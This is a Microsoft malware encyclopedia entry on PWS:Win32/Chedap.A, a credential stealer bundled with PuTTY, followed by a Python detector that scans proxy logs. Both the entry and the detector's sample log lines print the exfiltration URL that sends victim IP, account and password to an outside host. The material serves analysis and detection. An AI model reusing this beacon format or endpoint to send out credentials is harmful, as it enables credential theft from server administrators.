PWS:Win32/Chedap.A
First posted on 02 February 2012.
Source: Microsoft
Aliases:
There are no other names known for PWS:Win32/Chedap.A.
Explanation:
PWS:Win32/Chedap.A is a password stealer that targets FTP user accounts. The malware has been observed packaged with PuTTY; it targets FTP user accounts from a number of open source terminal emulators, including PuTTY, WinSCP and SSH Secure, that website and/or server administrators often use to maintain the server.
When the user runs the FTP tool, PWS:Win32/Chedap.A silently records the user's credentials and sends the stolen information to a remote server in the following format:
hxxp://l.ip-163.com:88/yj33/js2.asp?act=add&user=<Victim IP>&pwd=<User Account>&ll1=<Password>=&ll2=22&ll3=<FTP Program name>
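As an added illustration that is not part of the Microsoft write-up, the following Python scans constructed proxy log lines for requests matching the exfiltration URL format above and pulls out the fields a responder needs (the parameter names are misleading: `user` carries the victim IP, `pwd` the stolen account, `ll1` the password). The log line layout, client IPs and account names are assumptions; the password value is deliberately not copied into the alert.

```python
from urllib.parse import urlsplit, parse_qs

# Beacon characteristics as documented on this page. The parameter names are
# misleading: "user" carries the victim's IP, "pwd" the stolen account name,
# "ll1" the password, "ll2" the port and "ll3" the FTP/SSH program name.
CHEDAP_HOST = "l.ip-163.com"
CHEDAP_PATH = "/yj33/js2.asp"
CHEDAP_PARAMS = {"act", "user", "pwd", "ll1", "ll2", "ll3"}

# Constructed sample proxy log lines; the "<timestamp> <client> <method> <url>"
# layout is an assumption, not a real proxy product's format.
SAMPLE_PROXY_LOG = """\
2012-02-02T10:01:05Z 10.0.0.17 GET http://www.example.com/index.html
2012-02-02T10:02:11Z 10.0.0.17 GET http://l.ip-163.com:88/yj33/js2.asp?act=add&user=10.0.0.17&pwd=webadmin&ll1=s3cret=&ll2=22&ll3=putty.exe
2012-02-02T10:03:40Z 10.0.0.23 GET http://l.ip-163.com:88/yj33/js2.asp?act=add&user=10.0.0.23&pwd=deploy&ll1=hunter2=&ll2=22&ll3=WinSCP.exe
2012-02-02T10:04:02Z 10.0.0.23 GET http://example.org/js2.asp?act=add&user=x
"""


def parse_beacon(url):
    """Return the fields of a Chedap.A beacon URL, or None if the URL is not one."""
    parts = urlsplit(url)
    if parts.hostname != CHEDAP_HOST or parts.path != CHEDAP_PATH:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if not CHEDAP_PARAMS.issubset(qs) or qs["act"] != ["add"]:
        return None
    # The password itself (ll1) is deliberately not copied into the alert; the
    # responder only needs to know which account on which host to rotate.
    return {
        "victim_ip": qs["user"][0],
        "account": qs["pwd"][0],
        "port": qs["ll2"][0],
        "program": qs["ll3"][0],
        "credential_exposed": bool(qs["ll1"][0].rstrip("=")),
    }


def scan_proxy_log(text):
    """Return one alert dict per log line whose URL matches the documented beacon."""
    alerts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue
        timestamp, client, _method, url = fields
        beacon = parse_beacon(url)
        if beacon:
            alerts.append({"time": timestamp, "client": client, **beacon})
    return alerts
```

Each alert names the client that beaconed, the account and program involved, so the exposed credential can be rotated and the affected administrator workstation isolated.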
Using these stolen credentials, the attacker can easily compromise and control the victim's computer. An attacker can perform any number of different actions on an affected computer using PWS:Win32/Chedap.A. This could include, but is not limited to, the following actions:
- Download and execute arbitrary files
- Upload files
- Spread to other computers using various methods of propagation
- Log keystrokes or steal sensitive data
- Use the computer for botnet purposes
- Modify system settings
- Run or terminate applications
- Delete files
Analysis by Tim Liu
Last update 02 February 2012